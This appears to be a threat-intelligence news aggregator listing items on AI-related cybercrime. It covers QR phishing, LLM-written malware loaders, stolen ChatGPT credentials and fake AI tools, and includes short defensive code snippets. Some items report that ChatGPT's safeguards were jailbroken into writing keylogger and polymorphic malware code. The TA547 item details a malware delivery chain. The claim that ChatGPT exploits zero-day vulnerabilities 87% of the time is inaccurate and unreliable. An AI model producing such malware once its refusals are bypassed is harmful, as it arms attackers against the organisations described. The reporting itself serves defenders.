The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today's cybercriminals. It also examines how Proofpoint helps businesses to fortify their email defenses to protect people against today's emerging threats.  Proofpoint people protection: end-to-end, complete and continuous  So far in this series, we have examined these types of attacks:  Uncovering BEC and supply chain attacks (June 2023); Defending against EvilProxy phishing and cloud account takeover (July 2023); Detecting and analyzing a SocGholish attack (August 2023); Preventing eSignature phishing (September 2023); QR code scams and phishing (October 2023); Telephone-oriented attack delivery sequence (November 2023); Using behavioral AI to squash payroll diversion (December 2023); Multifactor authentication manipulation (January 2024); Preventing supply chain compromise (February 2024); Detecting multilayered malicious QR code attacks (March 2024); Defeating malicious application creation attacks (April 2024); Stopping supply chain impersonation attacks (May 2024); CEO impersonation attacks (June 2024); DarkGate malware (July 2024).  In this blog post, we look at how threat actors use QR codes in phishing emails to gain access to employee credentials.   Background  Many threat actors have adopted advanced credential phishing techniques to compromise employee credentials. One tactic on the rise is the use of QR codes. Recorded Future's Cyber Threat Analysis Report notes that there has been a 433% increase in references to QR code phishing and a 1,265% rise in phishing attacks potentially linked to AI tools like ChatGPT.   Malicious QR codes embedded in phishing emails are designed to lead recipients to fake websites that mimic trusted services. There, users are prompted to enter their login credentials, financial information or other sensitive data. Threat actors will often try to create a sense of urgency in a phishing attack - for example, claiming account issues or security concerns.   The use of QR codes in a phishing attack helps to provide a sense of familiarity for the recipient, as their email address is prefilled as a URL parameter. When they scan the malicious QR codes, it can open the door to credential theft and data breaches.  The scenario  Employees of a global developer of a well-known software application were sent a phishing email, which appeared to be sent from the company's human resources team. The email included an attachment and a call to action to scan a QR code, which led to a malicious site.   A key target of the attack was the vice president of finance. Had the attack been successful, threat actors could have accessed the company's finances as well as the login credentials, credit card information and location data for the app's millions of monthly active users.  The threat: How did the attack happen?  The phishing email sent by the attacker asked employees to review a document in an email attachment that was advertised as “a new company policy added to our Employee Handbook.”  Email sent from an uncommon sender to a division of the location sharing app's company.   The attachment contained a call to action: “Scan barcode to review document.”   The file type labeled “Barcode” resembling a QR code.   The “barcode” was a QR code that led to a phishing site. The site was made to look like the company's corporate website. 
It also appeared to be a legitimate site because it was protected by human verification technology, which can make it nearly impossible for other email security solutions to detect. The technology uses challenges (like CAPTCHAs) to prove that a clicker is a human and not a programmatic sandboxing solution.   Human verification request.  After the thr
Malware Tool Threat Cloud ChatGPT ★★★
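Defenders can treat QR lures like any other URL: decode the image and vet the destination before a human ever scans it. A minimal sketch, assuming the third-party Pillow and pyzbar packages (and the zbar system library) are installed; the allowlist is a placeholder:

```python
# Illustrative triage for QR codes found in email attachments: decode the
# image and check where the embedded URL actually leads.
# Assumes: pip install pillow pyzbar  (pyzbar also needs the zbar system lib).
from urllib.parse import urlparse

from PIL import Image
from pyzbar.pyzbar import decode

KNOWN_BRAND_HOSTS = {"capitalone.com", "www.capitalone.com"}  # example allowlist

def qr_targets(image_path: str) -> list[str]:
    """Return every URL payload decoded from QR codes in the image."""
    return [r.data.decode("utf-8", "replace") for r in decode(Image.open(image_path))]

def is_suspicious(url: str) -> bool:
    host = urlparse(url).hostname or ""
    return host not in KNOWN_BRAND_HOSTS

for url in qr_targets("attachment.png"):
    print(url, "-> SUSPICIOUS" if is_suspicious(url) else "-> ok")
```

Decoding server-side also defeats the attacker's goal of moving the click to an unmanaged phone, where email security tooling has no visibility.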
ESET.webp 2024-07-29 09:00:00 Beware of fake AI tools masking very real malware threats
(direct link)
Ever attuned to the latest trends, cybercriminals distribute malicious tools that pose as ChatGPT, Midjourney and other generative AI assistants
Malware Tool ChatGPT ★★
RiskIQ.webp 2024-07-26 19:24:17 Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave
(direct link)
## Snapshot
Palo Alto Networks analysts have found that cyber threat actors are exploiting the growing interest in generative artificial intelligence (GenAI) to conduct malicious activities.
## Description
Palo Alto Networks' analysis of domains registered with GenAI-related keywords revealed insights into suspicious activities, including textual patterns and traffic volume. Case studies detailed various attack types, such as delivery of potentially unwanted programs (PUPs), spam distribution, and monetized parking.
Adversaries often exploit trending topics by registering domains with relevant keywords. Analyzing newly registered domains (NRDs) containing GenAI keywords like "chatgpt" and "sora", Palo Alto Networks detected more than 200,000 NRDs daily, with roughly 225 GenAI-related domains registered every day since November 2022. Many of these domains, identified as suspicious, spiked in registration around major ChatGPT milestones, such as its integration with Bing and the release of GPT-4. Suspicious domains accounted for an average rate of 28.75%, significantly higher than the rate for NRDs overall. Most traffic to these domains was directed to a few major actors, with 35% of that traffic identified as suspicious.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for the different authentication methods and features.
- For MFA that uses authenticator apps, ensure the app requires a code to be typed where possible, since many intrusions where MFA was enabled still succeeded because users clicked "Yes" on the prompt on their phones even when they were not at their [devices](https://learn.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match?ocid=magicti_ta_learndoc). Refer to [this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for a
Ransomware Spam Malware Tool Threat Studies ChatGPT ★★★
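A back-of-the-envelope version of the NRD keyword analysis described above can run over any domain feed. A minimal sketch - the CSV format and keyword list are assumptions for illustration, not Palo Alto Networks' methodology:

```python
# Illustrative pass over a newly-registered-domain (NRD) feed: count how many
# registrations carry GenAI keywords, per day. Assumes one "date,domain" pair
# per line in nrd_feed.csv - a made-up format for this example.
import csv
from collections import Counter

GENAI_KEYWORDS = ("chatgpt", "gpt4", "sora", "deepseek", "copilot")

daily_total: Counter = Counter()
daily_genai: Counter = Counter()

with open("nrd_feed.csv", newline="") as fh:
    for date, domain in csv.reader(fh):
        daily_total[date] += 1
        if any(k in domain.lower() for k in GENAI_KEYWORDS):
            daily_genai[date] += 1

for date in sorted(daily_total):
    share = 100 * daily_genai[date] / daily_total[date]
    print(f"{date}: {daily_genai[date]}/{daily_total[date]} GenAI-flavored ({share:.2f}%)")
```

Spikes in the daily share around product launches would mirror the registration surges the researchers observed around ChatGPT milestones.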
RiskIQ.webp 2024-07-25 20:11:02 Growing Number of Threats Leveraging AI
(direct link)
## Snapshot
Symantec has identified an increase in cyberattacks using large language models (LLMs) to generate malicious code for downloading various payloads.
Read more about how Microsoft partnered with OpenAI to [stay ahead of threat actors in the age of AI](https://security.microsoft.com/intel-explorer/articles/ed40fbef).
## Description
LLMs, designed to understand and create human-like text, have applications ranging from writing assistance to customer-service automation, but they can also be exploited for malicious purposes. Recent campaigns involve phishing emails with code to download malware such as Rhadamanthys, NetSupport, and LokiBot. These attacks typically use LLM-generated PowerShell scripts delivered via malicious .lnk files inside password-protected zip files. One example attack involved an urgent funding email with such a zip file, containing scripts likely generated by an LLM. Symantec's research confirmed that LLMs like ChatGPT can easily produce similar scripts. The attack chain comprises initial access via phishing emails, execution of the LLM-generated scripts, and final payload download. Symantec highlights the growing sophistication of AI-facilitated attacks, underscoring the need for advanced detection capabilities and continuous monitoring to protect against these evolving threats.
## Microsoft analysis
Microsoft has identified actors such as Forest Blizzard, Emerald Sleet, Crimson Sandstorm, Charcoal Typhoon, and Salmon Typhoon leveraging LLMs to automate and optimize script generation; however, some of these actors have exploited LLMs in other ways, including reconnaissance, vulnerability research, social engineering, and language translation. Read more about how these actors interact with and use LLMs on the [Microsoft Security Blog](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/).
## Detections/hunting queries
Microsoft Defender Antivirus detects the threat components as the following malware:
- Trojan:MSIL/Lazy.BEAA!MTB
- Trojan:Win32/Oyster!MTB
- Trojan:JS/Nemucod!MSR
- Trojan:PowerShell/Malgent!MSR
- Trojan:Win32/Winlnk.AL
- Trojan:Win32/RhadamanthysLnk.DA!MTB
- Trojan:Win32/Leonem
- Trojan:JS/Obfuse.NBU
- Trojan:Win32/Lokibot
Malware Vulnerability Threat ChatGPT ★★★
AlienVault.webp 2024-07-23 10:00:00 What Healthcare Providers Should Do After A Medical Data Breach
(direct link)
The content of this post is solely the responsibility of the author. LevelBlue does not adopt or endorse any of the views, positions, or information provided by the author in this article.
Healthcare data breaches are on the rise, with a total of 809 data violation cases across the industry in 2023, up from 343 in 2022. The cost of these breaches also soared to $10.93 million last year, an increase of over 53% over the past three years, IBM’s 2023 Cost of a Data Breach report reveals. But data breaches aren’t just expensive, they also harm patient privacy, damage organizational reputation, and erode patient trust in healthcare providers. As data breaches are now largely a matter of “when” not “if”, it’s important to devise a solid data breach response plan. By acting fast to prevent further damage and data loss, you can restore operations as quickly as possible with minimal harm done.
Contain the Breach
Once a breach has been detected, you need to act fast to contain it, so it doesn’t spread. That means disconnecting the affected system from the network, but not turning it off altogether, as your forensic team still needs to investigate the situation. Simply unplug the network cable from the router to disconnect it from the internet. If your antivirus scanner has found malware or a virus on the system, quarantine it so it can be analyzed later. Keep the firewall settings as they are and save all firewall and security logs. You can also take screenshots if needed. It’s also smart to change all access control login details. Strong, complex passwords are a basic cybersecurity feature that is difficult for hackers and software to crack. It’s still important to record old passwords for future investigation. Also, remember to deactivate less-important accounts.
Document the Breach
You then need to document the breach so forensic investigators can find out what caused it, as well as recommend accurate next steps to secure the network now and prevent future breaches. So, in your report, explain how you came to hear of the breach and relay exactly what was stated in the notification (including the date and time you were notified). Also, document every step you took in response to the breach. This includes the date and time you disconnected systems from the network and changed account credentials and passwords. If you use artificial intelligence (AI) tools, you’ll also need to consider whether they played a role in the breach, and document this if so. For example, ChatGPT, a popular chatbot and virtual assistant, can successfully exploit zero-day security vulnerabilities 87% of the time, a recent study by researchers at the University of Illinois Urbana-Champaign found. Although AI is increasingly used in healthcare to automate tasks, manage patient data, and even make tailored care recommendations, it does pose a serious risk to patient data integrity despite the other benefits it provides. So, assess whether AI influenced your breach at all, so your organization can make changes as needed to better prevent data breaches in the future.
Report the Breach
Although your first instinct may be to keep the breach under wraps, you’re actually legally required to report it. Under the Data Breach
Malware Tool Vulnerability Threat Studies Medical ChatGPT ★★★
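The documentation step above - recording the date and time of every containment action - lends itself to a tiny append-only logbook. A minimal sketch with a hypothetical log path; hash-chaining entries is one simple way to make after-the-fact edits detectable:

```python
# Illustrative incident-response logbook: append timestamped entries for each
# containment step, as the breach documentation guidance above suggests.
import hashlib
import json
from datetime import datetime, timezone

LOG_PATH = "breach_log.jsonl"  # hypothetical log location

def log_action(action: str, prev_hash: str = "") -> str:
    entry = {
        "time": datetime.now(timezone.utc).isoformat(),
        "action": action,
        "prev": prev_hash,  # chaining hashes makes silent edits detectable
    }
    digest = hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()
    entry["hash"] = digest
    with open(LOG_PATH, "a") as fh:
        fh.write(json.dumps(entry) + "\n")
    return digest

h = log_action("Disconnected affected host from network (cable unplugged)")
h = log_action("Rotated credentials for admin accounts", prev_hash=h)
```

Whatever tooling is used, the point is the same: a contemporaneous, timestamped record that forensic investigators and regulators can rely on.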
bleepingcomputer.webp 2024-04-10 12:12:40 Malicious PowerShell script pushing malware looks AI-written
(direct link)
A threat actor is using a PowerShell script that was likely created with the help of an artificial intelligence system such as OpenAI's ChatGPT, Google's Gemini, or Microsoft's Copilot. [...]
Malware Threat ChatGPT ★★★
ProofPoint.webp 2024-04-10 10:12:47 Security Brief: TA547 Targets German Organizations with Rhadamanthys Stealer
(direct link)
What happened: Proofpoint identified TA547 targeting German organizations with an email campaign delivering Rhadamanthys malware. This is the first time researchers have observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors. In addition, the actor appeared to use a PowerShell script that researchers suspect was generated by a large language model (LLM) such as ChatGPT, Gemini, or Copilot. The emails sent by the threat actor impersonated the German retail company Metro, purporting to relate to invoices.

From: Metro!
Subject: Rechnung No: 31518562
Attachment: in3 0gc-(94762)_6563.zip

Example TA547 email impersonating the German retail company Metro.

The emails targeted dozens of organizations in various industries in Germany. The messages contained a password-protected ZIP file (password: MAR26) containing an LNK file. When the LNK file was executed, it triggered PowerShell to run a remote PowerShell script. This script decoded the Base64-encoded Rhadamanthys executable stored in a variable, loaded it as an assembly in memory, and then executed the assembly's entry point. This essentially executed the malicious code in memory without writing it to disk.

Notably, when deobfuscated, the second PowerShell script that was used to load Rhadamanthys contained interesting characteristics not commonly observed in code used by threat actors (or legitimate programmers). Specifically, the PowerShell script included a pound sign followed by grammatically correct, hyper-specific comments above each component of the script. This is typical output of LLM-generated coding content and suggests TA547 used some type of LLM-enabled tool to write (or rewrite) the PowerShell, or copied the script from another source that had used one (a simple triage heuristic for this marker is sketched after this story).

Example of PowerShell suspected to be written by an LLM and used in a TA547 attack chain.

While it is difficult to confirm whether malicious content is created via LLMs – from malware scripts to social engineering lures – there are characteristics of such content that point to machine-generated rather than human-generated information. Regardless, whether generated by human or machine, the defense against such threats remains the same.

Attribution: TA547 is a financially motivated cybercriminal threat considered an initial access broker (IAB) that targets various geographic regions. Since 2023, TA547 typically delivers NetSupport RAT but has occasionally delivered other payloads, including StealC and Lumma Stealer (information stealers with functionality similar to Rhadamanthys). The group appeared to favor zipped JavaScript attachments as initial delivery payloads in 2023, but switched to compressed LNKs in early March 2024. In addition to campaigns in Germany, other recent geographic targeting includes organizations in Spain, Switzerland, Austria, and the United States.

Why it matters: This campaign is an example of some technique shifts by TA547, including the use of compressed LNKs and the previously unobserved Rhadamanthys stealer. It also provides insight into how threat actors are leveraging likely LLM-generated content in malware campaigns. LLMs can help threat actors understand more sophisticated attack chains used Malware Tool Threat ChatGPT ★★
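The comment-style tell described in this brief lends itself to simple triage. Below is a minimal, hypothetical Python sketch (not a Proofpoint tool) that scores a PowerShell script by the share of statements preceded by full-sentence `#` comments, the marker the researchers describe; the "sentence-like" test and the 0.6 threshold are illustrative assumptions only.

```python
import re
import sys

def llm_comment_ratio(script_text: str) -> float:
    """Return the fraction of code statements directly preceded by a
    full-sentence '#' comment - a rough stylistic marker, not a verdict."""
    lines = [ln.strip() for ln in script_text.splitlines() if ln.strip()]
    statements = 0
    commented = 0
    prev_was_sentence_comment = False
    for ln in lines:
        if ln.startswith("#"):
            body = ln.lstrip("#").strip()
            # "Sentence-like": starts with a capital letter and has 4+ words.
            prev_was_sentence_comment = (
                bool(re.match(r"[A-Z]", body)) and len(body.split()) >= 4
            )
            continue
        statements += 1
        if prev_was_sentence_comment:
            commented += 1
        prev_was_sentence_comment = False
    return commented / statements if statements else 0.0

if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    ratio = llm_comment_ratio(text)
    # Threshold chosen arbitrarily for illustration; tune on your own corpus.
    verdict = "worth a closer look" if ratio > 0.6 else "unremarkable"
    print(f"sentence-comment ratio: {ratio:.2f} ({verdict})")
```

Such a ratio proves nothing on its own – as the brief notes, the defense is the same whether code is written by human or machine – but it can help prioritize samples for manual review.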
RecordedFuture.webp 2024-04-04 17:04:16 Cybercriminals are spreading malware through Facebook pages impersonating AI brands
(direct link)
Cybercriminals are taking over Facebook pages and using them to advertise fake generative artificial intelligence software loaded with malware. According to researchers at the cybersecurity company Bitdefender, the cybercrooks are taking advantage of the popularity of new generative AI tools and using "malvertising" to impersonate legitimate products like Midjourney, Sora AI, ChatGPT 5 and
Malware Tool ChatGPT ★★
News.webp 2024-03-07 06:27:08 Here's something else AI can do: expose bad infosec to give cyber-crims a toehold in your organization
(direct link)
Singaporean researchers note rising presence of ChatGPT creds in infostealer malware logs. Stolen ChatGPT credentials are a hot commodity on the dark web, according to Singapore-based threat intelligence firm Group-IB, which claims to have found some 225,000 stealer logs containing login details for the service last year.…
Malware Threat ChatGPT ★★★
RiskIQ.webp 2024-03-05 19:03:47 Staying ahead of threat actors in the age of AI
(direct link)
## Snapshot

Over the last year, the speed, scale, and sophistication of attacks have increased alongside the rapid development and adoption of AI. Defenders are only beginning to recognize and apply the power of generative AI to shift the cybersecurity balance in their favor and keep ahead of adversaries. At the same time, it is also important for us to understand how AI can be potentially misused in the hands of threat actors. In collaboration with OpenAI, today we are publishing research on emerging threats in the age of AI, focusing on identified activity associated with known threat actors, including prompt injections, attempted misuse of large language models (LLMs), and fraud. Our analysis of the current use of LLM technology by threat actors revealed behaviors consistent with attackers using AI as another productivity tool on the offensive landscape. You can read OpenAI's blog on the research [here](https://openai.com/blog/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors). Microsoft and OpenAI have not yet observed particularly novel or unique AI-enabled attack or abuse techniques resulting from threat actors' usage of AI. However, Microsoft and our partners continue to study this landscape closely.

The objective of Microsoft's partnership with OpenAI, including the release of this research, is to ensure the safe and responsible use of AI technologies like ChatGPT, upholding the highest standards of ethical application to protect the community from potential misuse. As part of this commitment, we have taken measures to disrupt assets and accounts associated with threat actors, improve the protection of OpenAI LLM technology and users from attack or abuse, and shape the guardrails and safety mechanisms around our models. In addition, we are also deeply committed to using generative AI to disrupt threat actors and leverage the power of new tools, including [Microsoft Copilot for Security](https://www.microsoft.com/security/business/ai-machine-learning/microsoft-security-copilot), to elevate defenders everywhere.

## Activity Overview

### **A principled approach to detecting and blocking threat actors**

The progress of technology creates a demand for strong cybersecurity and safety measures. For example, the White House's Executive Order on AI requires rigorous safety testing and government supervision for AI systems that have major impacts on national and economic security or public health and safety. Our actions enhancing the safeguards of our AI models and partnering with our ecosystem on the safe creation, implementation, and use of these models align with the Executive Order's request for comprehensive AI safety and security standards.

In line with Microsoft's leadership across AI and cybersecurity, today we are announcing principles shaping Microsoft's policy and actions mitigating the risks associated with the use of our AI tools and APIs by nation-state advanced persistent threats (APTs), advanced persistent manipulators (APMs), and cybercriminal syndicates we track. These principles include:

- **Identification and action against malicious threat actors' use:** Upon detection of the use of any Microsoft AI application programming interfaces (APIs), services, or systems by an identified malicious threat actor, including nation-state APT or APM, or the cybercrime syndicates we track, Microsoft will take appropriate action to disrupt their activities, such as disabling the accounts used, terminating services, or limiting access to resources.
- **Notification to other AI service providers:** When we detect a threat actor's use of another service provider's AI, AI APIs, services, and/or systems, Microsoft will promptly notify the service provider and share relevant data. This enables the service provider to independently verify our findings and take action in accordance with their own policies.
- **Collaboration with other stakeholders:** Microsoft will collaborate with other stakeholders to regularly exchange information a Ransomware Malware Tool Vulnerability Threat Studies Medical Technical APT 28 ChatGPT APT 4 ★★
The_Hackers_News.webp 2024-03-05 16:08:00 Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets
(direct link)
More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show. These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware. "The number of infected devices decreased slightly in mid- and late
Malware ChatGPT ★★★
SecurityWeek.webp 2024-02-14 18:25:10 Microsoft Catches APTs Using ChatGPT for Vuln Research, Malware Scripting
(direct link)
>Microsoft threat hunters say foreign APTs are interacting with OpenAI's ChatGPT to automate malicious vulnerability research, target reconnaissance and malware creation tasks.
Malware Vulnerability Threat ChatGPT ★★
Blog.webp 2024-01-26 17:26:19 Thousands of Dark Web Posts Expose ChatGPT Abuse Plans
(direct link)
>By Deeba Ahmed Cybercriminals are actively promoting the abuse of ChatGPT and similar chatbots, offering a range of malicious tools, from malware to phishing kits. This is a post from HackRead.com Read the original post: Thousands of Dark Web Posts Expose ChatGPT Abuse Plans
Malware Tool ChatGPT ★★★
InfoSecurityMag.webp 2024-01-24 17:15:00 ChatGPT Cybercrime Surge Revealed in 3000 Dark Web Posts
(direct link)
Kaspersky said cybercriminals are exploring schemes to implement ChatGPT in malware development.
Malware ChatGPT ★★
News.webp 2024-01-24 06:26:08 GCHQ's NCSC warns of 'realistic possibility' AI will help state-backed malware evade detection
(direct link)
That means British spies want the ability to do exactly that, eh? The idea that AI could generate super-potent, undetectable malware has been bandied about for years – and has also already been debunked. However, a paper published today by the UK's National Cyber Security Centre (NCSC) suggests there is a "realistic possibility" that by 2025 the most sophisticated attackers' tools will improve markedly thanks to AI models informed by data describing successful cyberattacks.… Malware Tool ChatGPT ★★★
TechRepublic.webp 2023-12-22 22:47:44 ESET Threat Report: ChatGPT Name Abuses, Lumma Stealer Malware Increases, Android SpinOk SDK Spyware's Prevalence
(direct link)
Risk mitigation tips are provided for each of these cybersecurity threats.
Malware Threat Mobile ChatGPT ★★★
ProofPoint.webp 2023-11-28 23:05:04 Proofpoint's 2024 Predictions: Brace for Impact
(direct link)
In the ever-evolving landscape of cybersecurity, defenders find themselves navigating yet another challenging year. Threat actors persistently refine their tactics, techniques, and procedures (TTPs), showcasing adaptability and the rapid iteration of novel and complex attack chains. At the heart of this evolution lies a crucial shift: threat actors now prioritize identity over technology. While the specifics of TTPs and the targeted technology may change, one constant remains: humans and their identities are the most targeted links in the attack chain.

Recent instances of supply chain attacks exemplify this shift, illustrating how adversaries have pivoted from exploiting software vulnerabilities to targeting human vulnerabilities through social engineering and phishing. Notably, the innovative use of generative AI, especially its ability to improve phishing emails, exemplifies a shift towards manipulating human behavior rather than exploiting technological weaknesses. As we reflect on 2023, it becomes evident that cyber threat actors possess the capabilities and resources to adapt their tactics in response to increased security measures such as multi-factor authentication (MFA). Looking ahead to 2024, the trend suggests that threats will persistently revolve around humans, compelling defenders to take a different approach to breaking the attack chain. So, what's on the horizon? The experts at Proofpoint provide insightful predictions for the next 12 months, shedding light on what security teams might encounter and the implications of these trends.

1. Cyber Heists: Casinos Are Just the Tip of the Iceberg

Cyber criminals are increasingly targeting digital supply chain vendors, with a heightened focus on security and identity providers. Aggressive social engineering tactics, including phishing campaigns, are becoming more prevalent. The Scattered Spider group, responsible for ransomware attacks on Las Vegas casinos, showcases the sophistication of these tactics. Phishing help desk employees for login credentials and bypassing MFA through phishing one-time password (OTP) codes are becoming standard practices. These tactics have extended to supply chain attacks, compromising identity provider (IDP) vendors to access valuable customer information. The forecast for 2024 includes the replication and widespread adoption of such aggressive social engineering tactics, broadening the scope of initial compromise attempts beyond traditional edge devices and file transfer appliances.

2. Generative AI: The Double-Edged Sword

The explosive growth of generative AI tools like ChatGPT, FraudGPT and WormGPT brings both promise and peril, but the sky is not falling as far as cybersecurity is concerned. While large language models took the stage, the fear of misuse prompted the U.S. president to issue an executive order in October 2023. At the moment, threat actors are making bank doing other things. Why bother reinventing the model when it's working just fine? But they'll morph their TTPs when detection starts to improve in those areas. On the flip side, more vendors will start injecting AI and large language models into their products and processes to boost their security offerings. Across the globe, privacy watchdogs and customers alike will demand responsible AI policies from technology companies, which means we'll start seeing statements being published about responsible AI policies. Expect both spectacular failures and responsible AI policies to emerge.

3. Mobile Device Phishing: The Rise of Omni-Channel Tactics Takes Centre Stage

A notable trend for 2023 was the dramatic increase in mobile device phishing, and we expect this threat to rise even more in 2024. Threat actors are strategically redirecting victims to mobile interactions, exploiting the vulnerabilities inherent in mobile platforms. Conversational abuse, including conversational smishing, has experienced exponential growth. Multi-touch campaigns aim to lure users away from desktops to mobile devices, utilizing tactics like QR codes and fraudulent voice calls Ransomware Malware Tool Vulnerability Threat Mobile Prediction Prediction ChatGPT ChatGPT ★★★
Trend.webp 2023-11-14 00:00:00 A Closer Look at ChatGPT's Role in Automated Malware Creation
(direct link)
This blog entry explores the effectiveness of ChatGPT's safety measures, the potential for AI technologies to be misused by criminal actors, and the limitations of current AI models.
Malware ChatGPT ★★
AlienVault.webp 2023-10-17 10:00:00 Re-evaluating risk in the artificial intelligence age
(direct link)
Introduction

It is common knowledge that when it comes to cybersecurity, there is no one-size-fits-all definition of risk, nor is there a place for static plans. New technologies are created, new vulnerabilities discovered, and more attackers appear on the horizon. Most recently, the appearance of advanced language models such as ChatGPT has taken this concept and turned the dial up to eleven. These AI tools are capable of creating targeted malware with no technical training required and can even walk you through how to use them. While official tools have safeguards in place (with more being added as users find new ways to circumvent them) that reduce or prevent them being abused, there are several dark web offerings that are happy to fill the void. Enterprising individuals have created tools that are specifically trained on malware data and are capable of supporting other attacks such as phishing or email compromises.

Re-evaluating risk

While risk should always be regularly evaluated, it is important to identify when significant technological shifts materially impact the risk landscape. Whether it is the proliferation of mobile devices in the workplace or easy access to internet-connected devices with minimal security (to name a few of the more recent developments), there are times when organizations need to completely reassess their risk profile. Vulnerabilities unlikely to be exploited yesterday may suddenly be the new best-in-breed attack vector today.

There are numerous ways to evaluate, prioritize, and address risks as they are discovered, which vary between organizations, industries, and personal preferences. At the most basic level, risks are evaluated by multiplying the likelihood and impact of any given event (a toy calculation along these lines is sketched after this story). These factors may be determined through numerous methods, and may be affected by countless elements, including:

- Geography
- Industry
- Motivation of attackers
- Skill of attackers
- Cost of equipment
- Maturity of the target's security program

In this case, the advent of tools like ChatGPT greatly reduces the barrier to entry, or the "skill" needed for a malicious actor to execute an attack. Sophisticated, targeted attacks can be created in minutes with minimal effort from the attacker. Organizations that were previously safe due to their size, profile, or industry may now be targeted simply because it is easy to do so. This means all previously established risk profiles are now out of date and do not accurately reflect the new environment businesses find themselves operating in. Even businesses that have a robust risk management process and mature program may find themselves struggling to adapt to this new reality.

Recommendations

While there is no one-size-fits-all solution, there are some actions businesses can take that will likely be effective. First, the business should conduct an immediate assessment and analysis of their currently identified risks. Next, the business should assess whether any of these risks could be reasonably combined (also known as aggregated) in a way that materially changes their likelihood or impact. Finally, the business must ensure their executive teams are aware of the changes to the business's risk profile and consider amending the organization's existing risk appetite and tolerances.

Risk assessment & analysis

It is important to begin by reassessing the current state of risk within the organization. As noted earlier, risks or attacks that were previously considered unlikely may now be only a few clicks from being deployed en masse. The organization should walk through their risk register, if one exists, and evaluate all identified risks. This may be time consuming, and the organization should of course prioritize critical and high risks first, but it is important to ensure the business has the information they need to effectively address risks.

Risk aggregation

Onc Malware Tool Vulnerability ChatGPT ★★★★
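As a toy illustration of the likelihood-times-impact model mentioned above, here is a short, hypothetical Python sketch of a risk-register triage pass; the 1-5 scales, field names, and example entries are assumptions for illustration, not from the original post.

```python
from dataclasses import dataclass

@dataclass
class Risk:
    name: str
    likelihood: int  # 1 (rare) .. 5 (almost certain)
    impact: int      # 1 (negligible) .. 5 (severe)

    @property
    def score(self) -> int:
        # Basic model from the article: risk = likelihood x impact.
        return self.likelihood * self.impact

# Hypothetical register entries; raising likelihood scores reflects the
# lowered barrier to entry that tools like ChatGPT create.
register = [
    Risk("Targeted phishing against finance staff", likelihood=4, impact=4),
    Risk("Commodity malware via email attachment", likelihood=3, impact=3),
    Risk("Custom malware against our niche industry", likelihood=2, impact=5),
]

# Highest-scoring risks first, so critical items get addressed first.
for risk in sorted(register, key=lambda r: r.score, reverse=True):
    print(f"{risk.score:>2}  {risk.name}")
```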
The_Hackers_News.webp 2023-10-09 16:36:00 "I Had a Dream" and Generative AI Jailbreaks
(direct link)
"Of course, here's an example of simple code in the Python programming language that can be associated with the keywords "MyHotKeyHandler," "Keylogger," and "macOS"" – this is a message from ChatGPT, followed by a piece of malicious code and a brief remark not to use it for illegal purposes. Initially published by Moonlock Lab, the screenshots of ChatGPT writing code for a keylogger malware is yet
Malware ChatGPT ★★★
AlienVault.webp 2023-09-06 10:00:00 Keeping cybersecurity regulations top of mind for generative AI use
(direct link)
The content of this post is solely the responsibility of the author. AT&T does not adopt or endorse any of the views, positions, or information provided by the author in this article.

Can businesses stay compliant with security regulations while using generative AI? It's an important question to consider as more businesses begin implementing this technology. What security risks are associated with generative AI? It's important to learn how businesses can navigate these risks to comply with cybersecurity regulations.

Generative AI cybersecurity risks
There are several cybersecurity risks associated with generative AI, which may pose a challenge for staying compliant with regulations. These risks include exposing sensitive data, compromising intellectual property, and improper use of AI.

Risk of improper use
One of the top applications for generative AI models is assisting in programming through tasks like debugging code. Leading generative AI models can even write original code. Unfortunately, users can find ways to abuse this function by using AI to write malware for them. For instance, one security researcher got ChatGPT to write polymorphic malware, despite protections intended to prevent this kind of application. Hackers can also use generative AI to craft highly convincing phishing content. Both of these uses significantly increase the security threats facing businesses because they make it much faster and easier for hackers to create malicious content.

Risk of data and IP exposure
Generative AI algorithms are developed with machine learning, so they learn from every interaction they have. Every prompt becomes part of the algorithm and informs future output. As a result, the AI may "remember" any information a user includes in their prompts. Generative AI can also put a business's intellectual property at risk. These algorithms are great at creating seemingly original content, but it's important to remember that the AI can only create content recycled from things it has already seen. Additionally, any written content or images fed into a generative AI become part of its training data and may influence future generated content. This means a generative AI may use a business's IP in countless pieces of generated writing or art. The black box nature of most AI algorithms makes it impossible to trace their logic processes, so it's virtually impossible to prove an AI used a certain piece of IP. Once a generative AI model has a business's IP, it is essentially out of their control.

Risk of compromised training data
